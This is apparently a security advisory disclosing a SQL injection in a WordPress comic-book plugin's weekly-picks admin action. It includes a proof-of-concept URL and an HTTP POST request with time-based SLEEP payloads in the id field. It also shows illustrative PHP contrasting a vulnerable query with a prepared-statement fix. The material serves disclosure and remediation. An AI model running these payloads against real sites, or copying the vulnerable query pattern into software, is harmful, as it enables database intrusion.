The plugin does not sanitize and escape the id parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.
https://example.com/wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(3)))hlAf)

POST /wp-admin/admin.php?page=cbms_weekly_picks_admin&action=update_picks&id=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------19015747673015629704320873707
Content-Length: 733
Origin: http://localhost:8080
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------19015747673015629704320873707
Content-Disposition: form-data; name="id"

2 AND (SELECT 7741 FROM (SELECT(SLEEP(10)))hlAf)
-----------------------------19015747673015629704320873707
Content-Disposition: form-data; name="imagefile"; filename="comicbookmanagementsystemweeklypicks_2_step-9.png"
Content-Type: image/png

PNG
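As an added illustration of the defect class and its fix (this is not the plugin's own code), a hypothetical handler for the update_picks action that interpolates the posted id into the query, beside a hardened version that validates the value and binds it with $wpdb->prepare(); the function names, table name and nonce action are assumptions.

```php
<?php
// Added example, not code from the affected plugin. The function names, the
// table name cbms_weekly_picks and the nonce action are assumptions.

// VULNERABLE pattern: the raw id field is concatenated into the SQL text, so
// the value controls part of the statement rather than being treated as data.
function cbms_load_pick_vulnerable() {
    global $wpdb;
    $id = $_POST['id'];
    return $wpdb->get_row(
        "SELECT * FROM {$wpdb->prefix}cbms_weekly_picks WHERE id = $id"
    );
}

// HARDENED pattern: validate the type first, then bind the value.
function cbms_load_pick_hardened() {
    global $wpdb;

    // CSRF check so the form cannot be submitted cross-site on an admin's
    // behalf. This is defence in depth, not the SQL injection fix itself.
    check_admin_referer( 'cbms_update_picks' );

    // absint() reduces the field to a non-negative integer; any payload such
    // as "2 AND (SELECT ...)" collapses to 2 (or 0 when nothing numeric leads).
    $id = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;
    if ( 0 === $id ) {
        wp_die( 'Invalid pick id.' );
    }

    // $wpdb->prepare() emits the value through a %d placeholder, so the
    // database only ever sees an integer literal in the WHERE clause.
    return $wpdb->get_row(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}cbms_weekly_picks WHERE id = %d",
            $id
        )
    );
}
```

Even with absint() in place, keep the prepare() call: the cast is the validation step, and the placeholder is what guarantees the value can never be parsed as SQL if the surrounding code changes.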
Kunal Sharma (University of Kaiserslautern), Daniel Krohmer (Fraunhofer IESE)
Kunal Sharma
Yes
2022-11-14 (about 6 months ago)
2022-11-14 (about 6 months ago)
2022-12-02 (about 5 months ago)